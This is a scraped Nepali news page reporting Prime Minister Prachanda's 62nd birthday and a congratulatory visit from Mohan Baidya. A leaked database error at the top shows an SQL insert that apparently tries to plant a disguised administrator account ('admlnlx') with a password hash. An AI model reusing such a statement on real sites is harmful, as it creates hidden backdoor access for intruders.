WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqAE5oQOMuB.WQPqfMuV63jaNWazok1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 07:29:53', '', 'admlnlx', 'admlnlx')

आज प्रधानमन्त्री प्रचण्डको जन्मदिन, वैद्यले दिए शुभकामना – Gaule Khabar

आज प्रधानमन्त्री प्रचण्डको जन्मदिन, वैद्यले दिए शुभकामना

आज प्रधानमन्त्री प्रचण्डको जन्मदिन, वैद्यले दिए शुभकामना

काठमाडौँ, मंसिर २६–

प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्ड आइतबार ६२ वर्षमा प्रवेश गरेका छन्। विस २०११ मंसिर २६ गते कास्की जिल्लाको ढिकुरपोखरी लेवाडेमा जन्मिएका प्रधानमन्त्री प्रचण्डको जन्मदिनको अवसरमा नेकपा क्रान्तिकारी माओवादीका अध्यक्ष मोहन वैद्य किरणले शुभकामना व्यक्त गरेका छन्।

प्रधानमन्त्री निवास बालुवाटार पुगेका अध्यक्ष वैद्यले प्रधानमन्त्री प्रचण्डलाई बधाई दिएका हुन्। यसकासाथै भेटका क्रममा समसामयीक राजनीतिक विषयमा छलफल भएको प्रधानमन्त्रीको निजी सचिवालयले जानकारी दिएको छ।  प्रधानमन्त्री प्रचण्डले अध्यक्ष वैद्यलाई समसामयीक राजनीतिक विषयमा सरकारले लिएका निर्णयहरूबारे जानकारी गराएका थिए।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका